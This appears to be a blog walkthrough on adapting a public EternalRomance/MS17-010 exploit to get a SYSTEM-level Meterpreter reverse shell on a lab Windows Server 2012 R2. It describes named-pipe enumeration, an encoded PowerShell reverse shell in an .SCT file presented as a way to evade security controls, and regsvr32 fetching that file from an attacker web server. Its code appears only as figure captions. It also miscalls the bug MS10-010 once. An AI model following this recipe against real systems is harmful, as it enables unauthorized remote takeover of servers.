ETERNALROMANCE/SYNERGY EXPLOITATION ON WINDOWS 2012R2

MS10-010 vulnerability patched by Microsoft affecting from windows 7 to a windows server 2016 (Eternalromance/synergy published by shadow brokers the exploits are very unstable if tried against the windows 2012, 2016 server causing 100% of the target machine BSOD

This is not a comprehensive article but we will demonstrate how we can leverage and make necessary changes to the Sleepys code and make minimal code change in order to obtain a privileged windows meterepreter reverse on the target system

Virtual Environment & prerequisites

Kali Ubuntu Machine  IP address 192.168.1.14

Python v.2.7

Ps1Encode   – Used to generate PowerShell metasploit types revershell

https://github.com/CroweCybersecurity/ps1encode

Windows Server 2012 R2 target IP   192.168.1.30 ( Not patched with MS17_010 )

Ok so without further ado let’s compromise windows 2012R2 server

The exploit has been published by sleepya https://www.exploit-db.com/exploits/42315/  the exploit is working properly without doing any modification if we execute the exploit against the windows 2012r2 server it will create a file  in C:\pawned.txt  on the target disk .

But you might already think hm but that doesn’t give me meterpreter shell on the target box , that’s very much true but we make couple of modification to get the desired shell

We now enabled guest account on our windows server R2 windows machine

guest-account

Figure 1  we set the authentication to “guest”  with minimal privilege

Parameters

The exploit code requires two parameters  the actual Target IP address windows server 2012R2 in our case and the PIPE name  – windows named pipe is not in the scope of this article. SMB protocol supports three different types of shares  File share which is a directory tree, Print: print share  which is access to print shares on the server,   PIPE inter communication between the process that uses FIFO model essentially first in first out  a.k.a  named pipes .

What other pipe types you can potentially exploits on a windows server box ?

  • Netlogon, samr, lsarpc,spoolss,browser

Ok it’s very straightforward to identify which named pipe are available on a target server – I wrote a python scrip which compares the UID to identify if the named pipe exist is so then just check access if allowed or denied

Script identify named pipes on the target windows server 2012 R2

named-pipes

Figure 2 allows identify named pipe Browser, Spools, Netlogon, LSARPC, SAMR

If we decide to execute the exploit it will create c:\\namlook.txt on the target .

2

Figure 3  executed code without reverse shell created c:\namlook.txt

Code snippet creates namlook.txt on the target server

1Figure 4 CreateFile function adds pwned.txt on the target server but no reverse shell code.

Executing code with our SCT reverse shell code ( SCT File Extension ) Windows script component

This is an affective approach to evade security controls using the SCT extension with embedded powershell reverse shell code. We wil l use PS1encode  that allows us to generate encoded metasploit codes in different/several format

Exploit Modification/Reverse shell

Executing code with our SCT reverse shell code ( SCT File Extension ) Windows script component. This is an affective approach to evade security controls using the SCT extension with embedded powershell reverse shell code. We wil l use PS1encode  that allows us to generate encoded metasploit codes in different/several format

We can download the ps1encode here  from github   https://github.com/CroweCybersecurity/ps1encode

SCT Reverse Shell code

3Figure 5 reverse shell code windows/meterepreter/reverse_tcp

Armed with .SCT reverse shell file we simply move the to our python web server on kali machine  /var/www/html  or any machine that can be reach from the target server. The idea is that when we execute the exploit against the target server to use regsvr32 (Microsoft Register Server) command line utility for registering and  DLLs in the windows registry

Reverse shell code

regsrc32-http-connection

Figure 6  – We modified code to execute our malicious revershell code .SCT  on our target machine

Meterpreter session

We now configrured the metasplot’s exploit/multi/handler to receive reverse shell

pingping

Figure 7 handler configured with windows/meterpreter/reverse_tcp

After executing modified MS17_010 exploit get clean meterpreter reverse shell

sysinfo

Figure 8 sysinfo with  NT/Authority priv ….

 

Go and patch please … https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s